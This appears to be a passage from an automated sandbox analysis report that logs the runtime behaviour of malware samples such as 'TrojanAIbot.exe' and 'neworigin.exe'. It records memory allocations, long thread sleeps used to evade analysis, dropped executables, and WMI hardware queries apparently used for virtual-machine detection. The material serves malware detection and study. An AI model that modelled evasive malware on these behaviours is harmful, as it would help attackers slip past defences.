Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 30B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 32F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 52F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 13E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4F90000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 1708	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7244
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 2893
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 6894
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 6957
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 2689
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5196
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4649

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	Dropped PE file which has not been started: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF

API coverage: 9.8 %

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452	Thread sleep count: 4765 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99792s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99227s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98915s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98788s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98667s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98560s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -98167s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97929s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97680s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97466s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97349s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97213s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -97089s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96966s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452	Thread sleep count: 1708 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96808s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96268s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96144s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -96020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95893s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95542s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95430s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -95087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94853s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94743s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94634s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94495s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94377s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94244s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -94113s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -93977s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -93660s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -93392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -93166s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99853s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224	Thread sleep time: -99688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5880	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep count: 7244 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052	Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200	Thread sleep time: -173580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200	Thread sleep time: -413640000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2636	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 1868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460	Thread sleep count: 6957 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98847s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98353s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98220s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97956s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97754s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97358s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96991s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96789s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95481s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95325s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94986s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94191s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93915s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99555s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99394s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -99059s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98628s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98223s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -98056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97817s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97245s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -97005s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96861s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460	Thread sleep count: 2689 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96480s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96368s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96263s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96151s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -96032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95904s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95794s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95576s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95467s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95357s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95248s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95139s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -95019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94495s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94283s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94154s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -94044s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93717s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -93498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512	Thread sleep time: -1199202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -99091s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98545s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -98210s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97611s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97483s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -97045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -96061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95951s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95733s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95620s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95405s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95165s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -95027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -94092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -93983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824	Thread sleep time: -93872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 372	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
